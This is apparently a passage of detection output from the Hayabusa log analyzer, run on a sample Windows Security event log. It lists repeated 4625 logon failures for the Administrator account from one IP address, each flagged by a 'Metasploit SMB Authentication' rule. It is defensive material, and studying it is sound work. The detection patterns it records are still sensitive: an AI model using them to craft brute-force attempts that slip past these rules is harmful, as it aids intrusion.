SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: 
